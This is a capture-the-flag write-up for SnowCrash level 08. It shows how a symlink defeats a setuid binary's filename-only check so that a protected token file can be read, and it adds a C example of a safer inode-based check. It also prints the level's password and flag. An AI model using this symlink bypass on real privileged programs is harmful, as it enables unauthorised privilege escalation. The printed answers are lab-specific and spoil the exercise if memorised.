snowcrash/levels/08
2026-01-19 17:43:30 +01:00

Level 08

How to log in

username: level08

password: fiumuikeil55xe9cu4dood66h

Goal

Run getflag as user flag08

Actually doing something

level08@SnowCrash:~$ ll
total 28
dr-xr-x---+ 1 level08 level08  140 Mar  5  2016 ./
d--x--x--x  1 root    users    340 Aug 30  2015 ../
-r-x------  1 level08 level08  220 Apr  3  2012 .bash_logout*
-r-x------  1 level08 level08 3518 Aug 30  2015 .bashrc*
-rwsr-s---+ 1 flag08  level08 8617 Mar  5  2016 level08*
-r-x------  1 level08 level08  675 Apr  3  2012 .profile*
-rw-------  1 flag08  flag08    26 Mar  5  2016 token

Interesting: we have the usual setuid binary, but we also have a file named token that we can't read. I wonder if the flag is there.

Let's run the binary and see what happens:

level08@SnowCrash:~$ ./level08 
./level08 [file to read]
level08@SnowCrash:~$ ./level08 token
You may not access 'token'

It is a little bit smart. Let's try to outsmart it by using symlinks:

level08@SnowCrash:~$ ln -s $(realpath token) /tmp/level08
level08@SnowCrash:~$ ./level08 /tmp/level08
quif5eloekouj29ke0vouxean

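The old tale of checking the filename and not the actual file! The binary refuses the name token, but it happily reads the same file through a symlink that has a different name.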
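The mistake described above, as an added C example (not the level08 binary's source, which this page does not show): name_check_allows is an assumed form of a filename-only check, and open_unless_protected is a hypothetical hardened alternative that compares the device and inode of the file it actually opened with the protected one. The files token, alias and notes are constructed and live in a scratch directory.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed weak check: looks only at the characters of the path argument. */
static int name_check_allows(const char *path) {
    return strstr(path, "token") == NULL;
}

/* Hardened check: open first, then compare the identity (device + inode) of
 * what was actually opened with the protected file. Returns an fd or -1. */
static int open_unless_protected(const char *path, const char *protected_path) {
    struct stat prot, st;
    if (stat(protected_path, &prot) != 0) return -1;   /* fail closed */
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || (st.st_dev == prot.st_dev && st.st_ino == prot.st_ino)) {
        close(fd);                       /* same file under another name */
        return -1;
    }
    return fd;                           /* caller reads from this fd */
}

static int touch(const char *p) { return close(open(p, O_CREAT | O_WRONLY, 0600)); }

/* Constructed scenario. out[0]/out[1]: weak/hardened check allows the link; out[2]: hardened allows "notes". */
static int demo(int out[3]) {
    char dir[] = "/tmp/symchk.XXXXXX";
    if (!mkdtemp(dir) || chdir(dir) != 0) return -1;
    if (touch("token") || touch("notes") || symlink("token", "alias")) return -1;
    out[0] = name_check_allows("alias");
    int fd = open_unless_protected("alias", "token");
    out[1] = fd >= 0; if (fd >= 0) close(fd);
    fd = open_unless_protected("notes", "token");
    out[2] = fd >= 0; if (fd >= 0) close(fd);
    unlink("alias"); unlink("token"); unlink("notes");
    return (chdir("/") == 0 && rmdir(dir) == 0) ? 0 : -1;
}

int main(void) {
    int r[3];
    if (demo(r) != 0) return 1;
    printf("weak allows link=%d hardened allows link=%d hardened allows notes=%d\n", r[0], r[1], r[2]);
    return 0;
}
```

Because the decision is made on the descriptor that was actually opened, there is no window between the check and the read, and any path that resolves to the protected file is refused.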

We can now get the actual token with that password:

level08@SnowCrash:~$ su flag08 -c getflag
Password: 
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f